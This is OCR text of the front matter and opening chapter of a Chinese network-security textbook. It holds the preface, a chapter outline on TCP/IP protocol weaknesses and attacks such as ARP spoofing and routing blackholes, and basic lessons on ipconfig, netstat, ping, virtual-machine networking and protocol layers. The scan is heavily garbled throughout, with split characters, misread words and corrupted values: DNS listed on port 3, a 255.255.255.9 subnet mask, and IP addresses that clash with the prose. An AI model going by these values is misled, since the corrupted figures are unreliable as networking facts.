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内 容 简 介 


本 书 共 分 为 11 章 ,按照 TCP/IP 协议 族 的 层次 结构 ,从 下 至 上 按照 数据 链 路 层 、 网 络 层 、 传 输 层 、 应 
用 层 的 次 序 展 开 , 重 点 研究 各 层 主要 协议 的 基本 原理 ,相关 协议 存在 的 漏洞 以 及 利用 这 些 安全 漏洞 实施 
的 网 络 攻击 和 攻击 痕迹 的 提取 分 析 方 法 。 

本 书 主要 的 学 习 目 标 包 括 : 掌 握 借助 Sniffer Pro 来 分 析 各 种 网 络 协议 的 方法 ,学 习 利用 协议 漏洞 实 
施 的 网 络 攻击 ,掌握 网 络 设备 的 配置 方法 ,掌握 在 网 络 设备 中 提取 入 侵 痕迹 的 方法 。 

传统 的 计算 机 网 络 教材 侧重 讲解 TCP/IP 的 基本 原理 ,与 之 不 同 ,本 书 重点 讲解 TCP/IP 的 相关 安 
全 漏洞 ,以 及 如 何 利用 这 些 安全 漏洞 实施 网 络 攻击 。 与 普通 的 网 络 安 全 类 教材 重点 讲解 安全 漏洞 的 防 
御 措 施 不 同 , 本 书 侧重 研究 网 络 攻击 之 后 如 何 提取 入 侵 痕迹 。 与 普通 的 计算 机 网 络 教 材 直 接 讲解 协议 
原理 不 同 ,本 书 借助 协议 分 析 仪 Sniffer Pro 来 学 习 网 络 协议 ,这 样 能 使 学 生 对 网 络 协议 有 一 个 清晰 、 直 
观 的 认识 。 

本 书 可 用 于 国内 公安 院 校 的 网 络 安全 类 专业 本 科 生 教学 ,也 可 作为 地 方 大 学 的 计算 机 类 、 信 息 类 相 
关 专 业 本 科 生 参考 用 书 。 


本 书 封面 贴 有 清华 大 学 出 版 社 防伪 标签 ,无 标签 者 不 得 销售 。 
版 权 所 有 ,侵权 必 究 。 侵 权 举 报 电 话 : 010-62782989 13701121933 
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出 豚 资 明 一 


21 世纪 是 信息 时 代 , 信 息 已 成 为 社会 发 展 的 重要 战略 资源 ,社会 的 信息 
化 已 成 为 当今 世界 发 展 的 潮流 和 核心 ,而 信息 安全 在 信息 社会 中 将 扮演 极为 
重要 的 角色 , 它 会 直接 关系 到 国家 安全 ,企业 经 营 和 人 们 的 日 常生 活 。 随 着 
信息 安全 产业 的 快速 发 展 ,全 球 对 信息 安全 人 才 的 需求 量 不 断 增加 ,但 我 国 
目前 信息 安全 人 才 极 度 匮乏 , 远 远 不 能 满足 金融 、 商 业 、 公 安 、 军 事 和 政府 等 
部 门 的 需求 。 要 解决 供需 矛盾 ,必须 加 快 信息 安全 人 才 的 培养 ,以 满足 社会 
对 信息 安全 人 才 的 需求 。 为 此 ,教育 部 继 2001 年 批准 在 武汉 大 学 开设 信息 
安全 本 科 专 业 之 后 ,又 批准 了 多 所 高 等 院 校 设 立信 息 安 全 本 科 专 业 , 而 且 许 
多 高 校 和 科研 院 所 已 设立 了 信息 安全 方向 的 具有 硕士 和 博士 学 位 授予 权 的 

信息 安全 是 计算 机 、 通 信 、 物 理 、 数 学 等 领域 的 交叉 学 科 , 对 于 这 一 新 兴 
学 科 的 培养 模式 和 课程 设置 ,各 高 校 普遍 缺乏 经 验 ,因此 中 国 计 算 机 学 会 教 
育 专 业 委员 会 和 清华 大 学 出 版 社 联合 主办 了 “信息 安全 专业 教育 教学 研讨 
会 "等 一 系列 研讨 活动 ,并 成 立 了 “高 等 院 校 信息 安全 专业 系列 教材 ”编审 委员 
会 ,由 我 国信 息 安全 领域 著名 专家 肖 国 镇 教授 担任 编 委 会 主任 ,指导 “高 等 院 校 
信息 安全 专业 系列 教材 ”的 编写 工作 。 编 委 会 本 着 研究 先行 的 指导 原则 ,认真 
研讨 国内 外 高 等 院 校 信息 安全 专业 的 教学 体系 和 课程 设置 ,进行 了 大 量 前 脆性 
的 研究 工作 ,而 且 这 种 研究 工作 将 随 着 我 国信 息 安 全 专业 的 发 展 不 断 深入 。 经 
过 编 委 会 全 体委 员 及 相关 专家 的 推荐 和 审定 ,确定 了 本 丛书 首 批 教材 的 作者 ， 
这 些 作者 绝 大 多 数 都 是 既 在 本 专业 领域 有 深厚 的 学 术 造 诈 、 又 在 教学 第 一 线 有 
丰富 的 教学 经 验 的 学 者 、 专 家 。 

本 系列 教材 是 我 国 第 一 套 专 门 针对 信息 安全 专业 的 教材 ,其 特点 是 : 

Q@ 体系 完整 .结构 合理 内容 先进 。 

@ 适应 面 广 :能 够 满足 信息 安全 .计算 机 、 通 信 工 程 等 相关 专业 对 信息 
安全 领域 课程 的 教材 要 求 。 

@ 立体 配套 : 除 主教 材 外 ,还 配 有 多 媒体 电子 教案 .习题 与 实验 指导 等 。 

@ 版 本 更 新 及 时 , 紧 跟 科学 技术 的 新 发 展 。 

为 了 保证 出 版 质量 ,我们 坚持 宁 缺 考 滥 的 原则 ,成 熟 一 本 ,出 版 一 本 ,并 
保持 不 断 更 新 ,力求 将 我 国信 息 安 全 领域 教育 .科研 的 最 新 成 果 和 成 熟 经 验 
反映 到 教材 中 来 。 在 全 力 做 好 本 版 教材 , 满足 学 生 用 书 的 基础 上 , 还 经 由 专 
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家 的 推荐 和 和 审定, 效 选 了 一 批 国外 信息 安全 领域 优秀 的 教材 加 入 到 本 系列 教材 中 ,以 进 一 
步 满 足 大 家 对 外 版 书 的 需求 。 热 切 期 望 广大 教师 和 科研 工作 者 加 入 我 们 的 队伍 ,同时 也 
欢迎 广大 读者 对 本 系列 教材 提出 宝贵 意见 ,以 便 我 们 对 本 系列 教材 的 组 织 、 编 写 与 出 版 工 
作 不 断 改进 ,为 我 国信 息 安 全 专业 的 教材 建设 与 人 才 培 养 做 出 更 大 的 贡献 。 

“高 等 院 校 信息 安全 专业 系列 教材 ”已 于 2006 年 年 初 正式 列 入 普通 高 等 教育 “十 一 
五 ”国家 级 教材 规划 ( 见 教 高 L2006]9 号 文件 (教育 部 关于 印发 普通 高 等 教育 “十 一 五 ” 国 
家 级 教材 规划 选 题 的 通知 》) 。 我 们 会 严 把 出 版 环节 ,保证 规划 教材 的 编校 和 印刷 质量 ， 
时 完成 出 版 任务 。 

2007 年 6 月 ,教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委员 会 成 立 大 会 既 第 一 次 会 
议 在 北京 胜利 召开 。 本 次 会 议 由 教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委员 会 主任 单 
位 北京 工业 大 学 和 北京 电子 科技 学 院 主办 ,清华 大 学 出 版 社 协办 。 教 育 部 高 等 学 校 信息 
安全 类 专业 教学 指导 委员 会 的 成 立 对 我 国信 息 安全 专业 的 发 展 起 到 重要 的 指导 和 推动 作 
用 。2006 年 教育 部 给 武汉 大 学 下 达 了 “信息 安全 专业 指导 性 专业 规范 研制 ”的 教学 科研 
项 目 。2007 年 起 该 项 目 由 教育 部 高 等 学 校 信息 安全 类 专业 教学 指导 委员 会 组 织 实施 。 
在 高 教 司 和 教 指 委 的 指导 下 ,项目 组 团结 一 致 ,努力 工作 ,克服 困难 ,历时 5 年 ,制定 出 我 
国 第 一 个 信息 安全 专业 指导 性 专业 规范 ,于 2012 年 底 通过 经 教育 部 高 等 教育 司 理工 科教 
育 处 授权 组 织 的 专家 组 评审 ,并 且 已 经 得 到 武汉 大 学 等 许多 高 校 的 实际 使 用 。2013 年 ， 
新 一 届 “ 教 育 部 高 等 学 校 信息 安全 专业 教学 指导 委员 会 成立。 经 组 织 审 查 和 研究 决定 ， 
2014 年 以 “教育 部 高 等 学 校 信息 安全 专业 教学 指导 委员 会 ”的 名 义 正式 发 布 (高 等 学 校 信 
息 安全 专业 指导 性 专业 规范 (由 清华 大 学 出 版 社 正 式 出 版 )。“ 高 等 院 校 信 息 安 全 专业 系 
列 教材 ”在 教育 部 高 等 学 校 信息 安全 专业 教学 指导 委员 会 的 指导 下 ,根据 (高 等 学 校 信息 
安全 专业 指导 性 专业 规范 ) 组 织 编写 和 修订 ,进一步 体现 科学 性 、 系 统 性 和 新 颖 性 ,及 时 反 
映 教学 改革 和 课程 建设 的 新 成 果 , 并 随 着 我 国信 息 安 全 学 科 的 发 展 不 断 完善 。 

我 们 的 E-mail 地 址 : zhangm@tup. tsinghua. edu. cn; 联 系 人 : 张 民 。 
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随 着 信息 科学 的 快速 发 展 ,网 络 攻防 技术 的 新 旧 更 蔡 速 度 也 在 加 快 ,两 
年 前 的 入 侵 技术 ,现在 可 能 已 经 过 时 。 与 网 络 攻防 技术 的 快速 更 新 .换代 相 
比 ,TCP/IP 的 更 新 相对 缓慢 ,多 年 前 推出 的 IPv6 协议 至 今 仍 未 完全 蔡 代 
IPv4 协议 。 这 导致 TCP/IP 的 漏洞 利用 技术 成 为 相对 稳定 的 网 络 攻击 技 
术 。 目 前 国内 高 校 普遍 将 研究 重点 放 在 TCP/IP 本 身 及 各 类 私有 协议 分 析 
上 ,忽视 了 协议 相关 漏洞 的 深入 研究 。“ 网 络 安全 基础 "教材 就 是 在 这 个 背景 
下 提出 的 , 它 在 分 析 协 议 基本 原理 的 基础 之 上 ,重点 研究 协议 的 相关 漏洞 , 通 
过 具体 实例 讲解 如 何 利用 这 些 漏 洞 , 既 有 理论 知识 ,又 有 实践 操作 ,可 以 使 学 
生 对 TCP/IP 的 相关 漏洞 有 一 个 全 面 的 了 解 。 

传统 的 计算 机 网 络 教 材 侧重 讲解 TCP/IP 的 基本 原理 ,与 之 不 同 ,本 书 
重点 讲解 TCP/IP 的 相关 安全 漏洞 ,以 及 不 法 分 子 是 如 何 利用 这 些 安全 漏洞 
的 。 与 普通 的 网 络 安全 类 教材 重点 讲解 安全 漏洞 的 防御 措施 不 同 , 本 书 侧重 
研究 网 络 攻击 之 后 如 何 提取 入 侵 痕 迹 。 与 普通 的 计算 机 网 络 教 材 直接 讲解 
协议 原理 不 同 ,本 书 借助 协议 分 析 仪 Sniffer Pro 来 学 习 网 络 协议 ,这 样 能 使 
学 生 对 网 络 协议 有 一 个 清晰 .直观 的 认识 。 

本 书 共 分 为 11 章 ,按照 TCP/IP 协议 族 的 层次 结构 ,从 下 至 上 按照 数据 
链 路 层 、 网 络 层 .传输 层 .应 用 层 的 次 序 展开 ,重点 研究 各 层 主要 协议 的 基本 
原理 、 相 关 协 议 存在 的 漏洞 ,利用 这 些 安全 漏洞 实施 的 网 络 攻击 ,以 及 攻击 痕 
迹 的 提取 分 析 方 法 。 各 章节 具体 安排 如 下 : 

第 1 章 网 络 安全 基础 概述 。 介 绍 基本 概念 和 常用 网 络 命令 ,重点 讲解 
网 络 协议 的 层次 结构 .虚拟 机 技术 和 协议 分 析 仪 Sniffer Pro 的 使 用 。 

第 2 章 数据 链 路 层 及 其 安全 问题 。 重 点 讲解 交换 机 的 地 址 学 习 机 制 ， 
以 及 针对 交换 机 的 MAC-PORT 生成 树 和 MAC 地 址 攻击 。 

第 3 章 IP 协议 及 其 安全 问题 。 重 点 讲解 网 络 地 址 转换 (NAT) 和 网 络 
层 的 安全 协议 IPSec。 

第 4 章 ARP 及 ARP 欺骗 。 重 点 讲解 ARP 欺骗 “中 间 人 ?攻击 “ 半 中 
间 人 ”攻击 .DNS 欺骗 ,以 及 ARP 欺骗 的 线索 调查 方法 。 

第 5 章 RIP 及 其 安全 问题 。 重 点 讲解 基于 RIP 欺骗 的 “中 间 人 ”攻击 和 
“黑洞 "攻击 。 

第 6 章 OSPF 协议 及 其 安全 问题 。 重 点 讲解 基于 OSPF 路 由 欺骗 的 网 
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络 监听 和 “黑洞 "攻击 。 

第 7 章 ICMP 及 其 安全 问题 。 重 点 讲解 基于 ICMP 重 定向 的 “ 半 中 间 人 ”攻击 、 基 于 
DNS 协议 和 ICMP 重 定向 的 数据 监听 方法 。 

第 8 章 运输 层 协议 及 其 安全 问题 。 重 点 讲解 TCP 和 UDP 端口 扫描 。 

第 9 章 SMTP/POP3 及 DNS 协议 。 重 点 讲解 利用 Sniffer 学 习 发 送 邮 件 的 通信 过 
程 , 利 用 Sniffer 追查 盗号 木马 线索 的 方法 。 

第 10 章 HTTP 及 其 安全 问题 。 重 点 介绍 HTTP 的 三 种 提交 参数 方式 , 即 GET、 
POST 和 Cookie 方 式 , 以 及 数据 加 密 协议 SSL 。 

第 11 章 FTP 及 其 安全 问题 。 重 点 讲解 控制 连接 和 数据 连接 的 建立 过 程 ,以 及 利用 
Sniffer 分 析 FTP 的 通信 过 程 。 
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第 1 可 网络 安 全 基础 概述 


1.1.1 基本 概念 


(1) MAC 地 址 : 由 6 个 字 节 组 成 ,用 于 在 局 域 网 内 部 实现 主机 到 主机 的 通信 。 

(2) IP 地 址 : 由 4 个 字 节 组 成 ,用 于 实现 跨越 不 同 网 络 的 主机 到 主机 的 通信 。 

(3) 端口 号 : 是 一 个 整数 , 取 值 区 间 为 0 一 65 535, 每 个 端口 对 应 一 个 应 用 层 协 议 ， 
0 一 1023 保留 给 知名 协议 ,实现 进程 到 进程 的 通信 。 图 1-1 给 出 的 是 基于 TCP 的 知名 应 
用 层 协 议 的 端口 号 。 


端口 协议 

7 Echo 

20 FTP, data 
21 FTP, control 
23 Telnet 

25 SMTP 

3 DNS 

80 HTIP 

111 RPC 


图 1-1 使 用 TCP 的 知名 协议 的 端口 号 


1.12 常用 网 络 命令 的 使 用 


1. 使 用 ipcorfig 命令 查看 本 机 的 PP 地 址 

使 用 ipconfig 命令 可 以 查看 本 机 的 IP 地 址 、. 子 网 掩 码 .默认 网 关 。 使 用 方法 为 : 单 
击 “ 开 始 ” 一 “运行 ”选项 ,输入 “cmd”, 单 击 “ 确 定 ” 按 钮 ,在 出 现 的 DOS 窗口 中 输入 
ipconfig 后 回 车 。 图 1-2 为 使 用 ipconfig 命令 查看 到 的 本 机 的 地 址 信息 。 


2 使 用 ipcorfig /all 命令 查看 本 机 的 全 部 地 址 信息 
使 用 ipconfig /all 命令 查看 本 机 的 全 部 地 址 信息 ,包括 DNS 服务 器 的 IP 地 址 和 本 
机 的 MAC 地 址 。 图 1-3 为 使 用 ipconfig /all 命令 查看 到 的 本 机 的 全 部 地 址 信息 


3. 使 用 netstat -an 命令 查看 本 机 的 网 络 连接 情况 
使 用 netstat -an 命令 查看 本 机 的 网 络 连接 情况 ,也 可 以 了 解 本 机 端口 开放 情况 。 
图 1-4 为 netstat -an 的 执行 结果 。 结 果 包 括 4 个 字段 ,依次 为 协议 类 型 、 本 地 地 址 、 远 程 


Windows IP Configuration 


Ethernet adapter 本 


Connection-specific DNS Suffix 


IP Address. .. Pe | 192.168.2.19 
St 255.255.255.9 
Default Gateway . . . . . . . . . : 192.168.2.1 


网 卡 编号 


IP 地 址 


子 网 掩 码 


图 1-2 使 用 ipconfig 命令 查看 到 的 本 机 的 地 址 信息 


5 Da VWIIDOWSNsystea32Vcad exe 


pb:\>ipconfig /all 


Windows IP Configuration 


Host Name . : ccpc-a6e3da4a51 
Primary Dns Suffix 

Node Type . Unknown 

IP Routing Enabled No 

WINS Proxy Enabled : No 


Ethernet adapter 本 地 


Connection-specific DNS Suffix 


Description . :+ UMware Uirtual Ethernet hdapter for UMnet1 


Physical Address 89-56-56-C9-69-61 
Dhcp Enabled 到 总 No 

IP hddress 192.168.2.19 
Subnet Mask 255.255.255.9 
Default Gateway 192.168.2.1 

DNS Seruers 216.47.128.135 


图 1-3 使 用 ipconfig /all 命令 查看 到 的 本 机 的 全 部 地 址 信息 


TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 


Proto 


:N>netstat -an 


Active Connections 


Local hddress Foreign hddress 
9 


State 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
ESThRBLISHED 
ESThRBLISHED 
LISTENING 
ESTABLISHED 


图 1-4 netstat -an 的 执 


天 


默认 网 关 


主机 名 称 


MAC 地 址 


DNS 服务 器 IP 


F 放 了 TCP 


的 135 端 口 


正在 与 192.168.2.3 
的 80 端 口 通 信 


F 放 UDP 


的 1042 端 口 
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地 址 状态。 第 1 条 记录 中 的 0. 0. 0. 0 代表 本 机 所 有 的 IP 地 址 ( 注 : 计算 机 可 能 安装 多 
块 网 卡 , 因 此 可 能 存在 多 个 IP 地 址 ) , 它 表 明 本 机 在 所 有 IP ae TCP135 端口 。 
第 7 条 记录 表明 本 机 在 IP 地 址 192. 168. 2. 10 上 开放 了 139 端口 。 第 8 条 记录 表明 本 机 
正在 使 用 IP 地 址 192. 168. 2. 10 和 端口 1223 与 远程 主机 192. 168. 2. 3 的 80 端口 进行 
TCP 通信 , 且 连 接 状 态 为 已 建立 。 这 条 记录 说 明 本 机 正在 浏览 Web 服务 器 的 主页 。 第 
14 条 记录 说 明 本 机 在 所 有 IP 地 址 上 开放 了 UDP 的 1042 端口 。 


4 使 用 ping 命令 测试 网 络 通信 状态 

使 用 ping 命令 可 以 测试 网 络 通信 状态 ,执行 该 命令 的 主机 将 向 目标 主机 发 送 4 个 
ICMP 请 求 报 文 ,目标 主机 会 | 4 个 ICMP 应 答 报 文 , 如 果 这 些 报 文 能 够 正常 传输 ,说 
明 通 信 线 路 正常 。 因 此 该 命令 通常 用 于 测 tr we : 常 工作 。 图 1-5 为 在 本 机 执 
行 ping 命令 的 结果 。 从 统计 结果 可 知 ,本 机 发 送 了 4 个 ICMP 请 求 报 文 ,对 方 返回 4 个 
ICMP 应 答 报 文 ,这 说 明 通 信 线 路 正常 。 


5 INDOWS\systen32\cad. exe [ -jx| 
D:\>ping 192.168.2.3 


Pinging 192.168.2.3 with 32 bytes of data: 


Reply from 192.168.2.3: bytes:32 time<ims :128 
: bytes:32 time<1ms =128 

: bytes:32 time<ims =128 

Reply from .2.3: bytes:32 time<ims =128 


Ping statistics for 192.168.2.3: 
Packets: Sent = #4, Receiued = 村， = (6X loss), 


Minimum = Qms, Maximum = ,gms，huerage = 


发 送 4 个 报 文 接收 到 4 个 应 答 
图 1-5 通信 正常 时 ping 命令 的 结果 


图 1-6 为 通信 中 断 时 ping 命令 的 执行 结 结果 可 知 ,本 机 向 目标 主机 发 送 了 
个 ICMP 请 求 报 文 ,但 是 没有 收 到 应 Sa 判断 通信 中 断 。 


INDOWS\syst en32\cad. exe [-Ic[xl 
ping 192.168.2.20 


Pinging 192.168.2.20 with 32 bytes of data: 


Request timed out. 超时 
timed out. 
timed out. 
timed out. 


Ping statistics for 192.168.2.20: 
Packets: Sent : 4, Received = 0, Lost =: 4 (199X loss), 


D:\> 


发 送 4 个 报 文 ”没有 收 到 应 答 
图 1-6 通信 中 断 时 ping 命令 的 执行 结果 


网 络 安全 基础 


在 ping 命令 后 携带 -t 参数 可 以 向 wow ICMP 数据 报 , 这 个 参数 
通常 用 于 调试 网 络 故障 。 图 1-7 为 在 本 机 执行 ping 192. 168. 2. 3 -t 命令 的 结果 ,本 机 会 
不 停 地 向 192. 168. 2. 3 主机 发 送 ICMP 数据 报 ， Perea 键 终 止 通信 。 


© D:\VWINDOVYS\systen32\cad. exe — ping 192.168.2.3 -—t 
D:\>ping 192.168.2.3 -t 


Pinging 192.168.2.3 with 32 bytes of data: 


Reply from 192.168. : bytes:32 time<1ms TTL: 
Reply from 192.168. : bytes:32 time<ims TTL= 
Reply from 192.168 : bytes=32 time<ims TTL: 
Reply from 192. : bytes:32 time 人 1ms TTL: 
Reply from 192. .2.3: bytes:32 time<ims TTL: 
Reply from 192. : bytes=32 time<ims TTLz 
Reply from 192 . 和 曙 bytes:32 time<ims TTL: 
Reply from 192. .2.3: bytes:32 time<1ms TTL: 


图 1-7 使 用 -t 参 数 连续 不 断 地 发 送 数 据 


12 ”虚拟 机 技术 


为 什么 要 引入 虚拟 机 技术 呢 ? 因为 网 络 安全 实验 需要 一 个 由 多 台 计 算 机 组 成 的 联网 
环境 ,而 虚拟 机 恰好 满足 这 一 特点 。 虚 拟 机 软 je 以 在 一 台 计 算 机 上 模拟 出 若干 台 


“PC”, 同 时 这 些 PC 通过 一 台 Hub 组 成 一 个 网 络 。 Hub 
图 1-8 为 利用 虚拟 机 组 建 的 网 络 环境 。 本 机 和 利用 ja 


虚拟 机 模拟 出 来 的 PC1 及 PC2 形成 了 一 个 由 三 台 计 
ee 互联 设备 为 一 台 集线器 。 注 意 : 这 J J J 
是 一 个 广播 式 网 络 , 即 任何 一 台 i 都 可 以 截获 其 他 本 机 PCI1 PC2 
主机 之 间 的 通信 数据 。 图 1-8 利用 虚拟 机 组 建 的 网 络 环境 
主机 可 以 同时 运行 虚拟 机 的 数量 受 内 存 大 小 的 
限制 。 例 如 ,1GB 内 存 的 主机 可 同时 运行 两 台 Windows 虚拟 机 ,2GB 内 存 的 主机 可 同时 
运行 4 台 Windows 虚拟 机 。 
虚拟 机 的 联网 方式 包括 : host-only、 桥 接 、NAT。 以 host-only 方式 运行 的 虚拟 机 只 
能 与 本 机 或 其 他 虚拟 机 通信 ,而 不 能 与 外 部 主机 通信 ,同时 它 不 要 求 本 机 实际 接 入 一 个 物 
理 网 络 。 相 反 , 以 桥接 方式 运行 的 虚拟 机 要 求 本 机 实际 接 入 物理 网 络 ,只 要 虚拟 机 IP 地 
址 信息 配置 得 当 , 虚 拟 机 就 可 以 与 外 部 主机 正常 通信 。 以 NAT 方式 运行 的 虚拟 机 相当 
通过 本 机 代理 与 外 网 通信 ,虚拟 机 设置 自动 捕获 IP 地 址 ,本 机 会 自动 为 虚拟 机 分 配 IP 
地 址 。 
训练 : 以 host-only 方式 启动 Windows XP 虚拟 机 ,为 虚拟 机 配置 IP 地 址 ,在 虚拟 机 
上 使 用 ping 命令 测试 本 机 和 虚拟 机 的 通信 情况 。 
第 一 步 : 安装 Windows XP 虚拟 机 (步骤 略 ) 。 


第 二 步 : 设置 联网 方式 为 host-only。 

在 虚拟 机 控制 界面 选择 “编辑 虚拟 机 设置 "一 network adapter, 将 联网 方式 更 改 为 
host-only, 单 击 “ 确 定 ” 按 钮 启动 虚拟 机 。 

第 三 步 : 配置 虚拟 机 IP 地 址 。 

右 击 “网 上 邻居 ”一 选择 “属性 ”一 右 击 “ 本 地 连接 ”一 “属性 ”>“Internet 协议 (TCP/ 
IP)” 一 “属性 ”, 输 入 IP 地 址 、 子 网 掩 码 ( 保 证 虚拟 机 和 本 机 处 于 同一 个 网 段 )。 图 1-9 是 
虚拟 机 的 IP 地 址 配置 界面 。 


Internet 协议 (ICP/IP) 属性 


党 规 


如 果 网 络 支持 此 功能 ， 风 由 扫 禾 江 自 动手 泊 折 于 IP 设置 否则 ， 
您 需要 从 网 络 系统 管理 员 处 获得 适当 的 卫 


人 自动 获得 IP 地 址 @) 

全 使 用 下 面 的 IF 地 址 G) 

IP 地 址 加 ) 192 .166 . 2 .3 
子 网 掩 码 255 .255 .255 . 0 


默认 网 关 四 ) 


人 多 使 用 下 面 的 DNS 服务 器 地 址 到) 
首选 DNS 服务 器 @) 
备用 DRS 服务 器 由) 


图 1-9 配置 虚拟 机 的 IP 地 址 


第 四 步 : 在 虚拟 机 上 使 用 ping 命令 测试 本 机 和 虚拟 机 的 通信 情况 。 
在 虚拟 机 上 使 用 ping 命令 测试 本 机 和 虚拟 机 的 通信 情况 。 图 1-10 为 执行 结果 ,从 
结果 可 以 看 出 虚拟 机 和 本 机 之 间 的 通信 正常 。 


C:\VINDOYS\systen32\cnd. exe 
C:\Vping 192.168.2.19 


Pinging 192.168.2.19 with 32 bytes of data 


Reply from 192.168.2.10: bytes:32 time=2ms TTL:128 
Reply from 192.168.2.10: bytes:32 time<ims TTL:128 
Reply from 192.168.2.10: bytes:32 time<ims TTL:128 


Reply from 192.168.2.10: bytes=32 time<ims TTL:=128 


Ping statistics for 192.168.2.10: 

Packets: Sent = 4, Received : 4, Lost = 0 (9X loss), 
Approximate round trip times in milli-seconds: 

Minimum = Oms, Maximum = 2ms, Average = gms 


图 1-10 在 虚拟 机 上 执行 ping 命令 


训练 : 在 Windows XP 虚拟 机 的 Web 服务 器 的 主 目录 下 设计 一 个 简单 的 网 页 
index. html, 内 容 为 hello ,在 本 机 浏览 该 网 页 。 


网 络 安全 基础 ”IE 


第 一 步 : 以 host-only 方式 启动 Windows XP 虚拟 机 并 配置 IP 地 址 (步骤 略 ) 。 
第 二 步 : 在 虚拟 机 上 确定 网 站 主 目录 的 位 置 。 
可 以 利用 Windows 系统 自 带 的 IIS 服务 器 构建 网 站 ,只 要 将 开发 好 的 网 页 文件 ( 例 
如 . asp 或 . html) 放 置 到 网 站 的 主 目录 中 ,远程 用 户 就 可 以 浏览 到 网 站 内 容 。 这 里 首先 确 
定 网 站 主 目录 的 位 置 : 选择 “开始 ”一 “设置 "一 “控制 面板 ”, 双击 “管理 工具 ”, 双击 
“Internet 信息 服务 ”, 依 次 展开 树 型 结构 出 现 * 默 认 站 点 ”( 见 图 1-11) 。 
文件 四 操作 @) 查看 0 帮助 0 
亿 字 | 四 | 国 | 罗 国 图 | 贸 | 旦 | Pl 
Internet 信息 服务 


日 -里 好 (林地 计算 机 ) 
日 生 网 站 


:windows\help\iishelp 


C: \WINDOWS\web\printers 


认同 站 | C:AEyoallaill 
元 默认 SINTP 虚拟 服务 器 CAEyoulail 


图 1-11 默认 站 点 


右 击 “ 默 认 站 点 ”>“ 属 性 ”>“ 网 站 ”选项 卡 , 在 IP 地 址 列表 中 选择 全 部 未 分 配 (这 样 
网 站 会 工作 在 虚拟 机 的 所 有 IP 地 址 上 ,远程 用 户 使 用 哪个 IP 地 址 都 可 以 访问 网 站 ), 选 
中 “ 主 目录 ”选项 卡 ,在 “本 地 路 径 ” 文 本 框 中 保存 的 就 是 网 站 的 主 目录 。 图 1-12 为 虚拟 机 


网 站 _ | ISAPI 第 选 器 ] 主 目 录 [文档 | 目录 安全 性 [YTTF 头 上 | 自 定义 错误 
连接 到 辽源 时 的 内 容 来 源 : 
ET 机 上 的 目录 全 ] 
加 另 一 台 计 算 机 上 的 共享 @) 
人 〇 重 定向 到 WRL) 
本 地 路 径 (C): [Evaaa [EE 
回 脚本 资源 沪 问 [) 回 记录 访问 
回 读 取 @@) 回 索引 资源 如 ) 
| 回 写 和 0 
回 目录 浏览 @) 
应 用 程序 设置 
应 用 程序 名 如 : 。。 像 认 应 用 程序 [于 四 
开始 位 置 伍 认 网 站 > 
配置 @). . 
| 执行 权限 加 ): 纯 脚本 图 [EB 
| 应 用 程序 保护 四 : [中 民用) 图 [号 加 ] 


CD OR CW 


图 1-12 虚拟 机 的 主 目录 位 于 E:\aaa 


的 主 目录 配置 界面 ,可 见 主 目录 为 下 :Naaa。 

第 三 步 : 将 网 页 文件 放置 到 网 站 的 主 目录 ,在 本 机 浏览 网 页 。 

新 建 一 个 网 页 文件 index. html, 内 容 输入 hello。 将 网 页 放置 到 下 :Naaa 路 径 下 ,在 本 
机 浏览 index. html, 结 果 如 图 1-13 所 示 。 


< ht //192. 168. 2. 3/index. htal - Windows Internet Expl--- CE 区] 
GO Ev rr Ma) [x 
文件 下 ) 编辑 EE) 查看 收藏 夹 &) 工具 CX) 帮助 

宽 收藏 天 | 次 剧 建议 网 站 ”加 免费 lotmail 加 网页 快讯 库 - 


外 http://192. 168.2.3/... 国 | 从 - 局 咒 -页 面 @) ”安全 G)- 


图 1-13 在 本 机 浏览 index. html 


Wk 网 络 协 议 的 层次 结构 


统治 当今 的 数据 通信 与 网 络 的 分 层 协 议 栈 是 5 层 因特网 模型 ,也 称 为 TCP/IP 协议 
徐 , 该 模型 有 5 个 层次 ,从 下 至 上 分 别 是 物理 层 、 数 据 链 路 层 、 网 络 层 、 传 输 层 和 应 用 层 。 
所 有 的 TCP/IP 按照 其 功能 被 划分 到 不 同 的 层次 


应 用 层 |ISMTP|| FTP ||TFTP|| DNS|ISNMP| … |HTTP 
传输 层 SCTP TCP UDP 
IGMPIICMP| 
on 
ARPIIRARP 
数据 链 路 层 
低层 LAN 技 术 
物理 层 


图 1-14 因特网 的 层次 结构 或 TCP/IP 协议 族 


图 1-15 给 出 了 采用 因特网 模型 的 数据 交换 过 程 ,下 面 以 发 送 方 将 一 封 电子 邮件 发 给 
接收 方 为 例 进行 说 明 。 

先 看 左边 发 送 方 产生 数据 包 的 过 程 。 因 为 是 传送 电子 邮件 ,因此 应 用 层 的 SMTP 准 
备 好 邮件 数据 L5 data( 包 括 邮件 正文 ), 并 添加 头 部 H5( 包 括 收 信 、 发 信和 邮箱 地 址 等 信 
息 ) ,然后 将 数据 向 下 传递 给 传输 层 的 TCP。TCP 在 接收 数据 的 前 端 增加 一 个 头 部 H4 
(包括 源 和 目的 端口 , 源 端口 为 大 于 1024 的 随机 端口 ,目的 端口 为 25) ,然后 将 数据 向 下 


IE 网 络 安全 基础 ”ES 


传递 给 网 络 层 的 IP 协议 。IP 协议 在 接收 数据 的 前 端 增加 一 个 头 部 H3( 包 括 源 和 目的 IP 
地 址 , 源 IP 地 址 为 发 送 方 IP、 目 的 IP 地 址 为 接收 方 IP) ,之 后 将 数据 向 下 传递 给 数据 链 
路 层 。 数 据 链 路 层 收 到 这 组 数据 之 后 ,在 其 前 端 增加 一 个 头 部 H2( 包 括 源 和 目的 MAC 
地 址 , 源 MAC 地 址 为 发 送 方 MAC, 目 的 MAC 地 址 为 接收 方 MAC) ,在 其 后 端 添加 一 
个 尾部 T2( 存 储 的 是 保证 数据 完整 性 的 校 验 和 ) ,然后 将 数据 向 下 交 给 物理 层 。 物 理 层 
将 接收 到 的 二 进 制 数据 信息 转换 为 能 在 介质 上 传输 的 模拟 信号 ,之 后 通过 传输 介质 发 
送出 去 。 


发 送 方 接收 方 
县 、 县 、 
L5data |HS 3 L5 data |H5 
1 | | | 
L4 data | H4| 4 4 L4 data H4 
上 上 1 1 
L3 data H3 3 3 L3 data H3 
上 1 1 1 
T2 L2 data H2| | 2 | [7 L2 data 加 
| Hl 而 1 1 
010101010101101010000010000 | | 1 1 | [orororo10101101010000010000 | 


Transmission medium , 


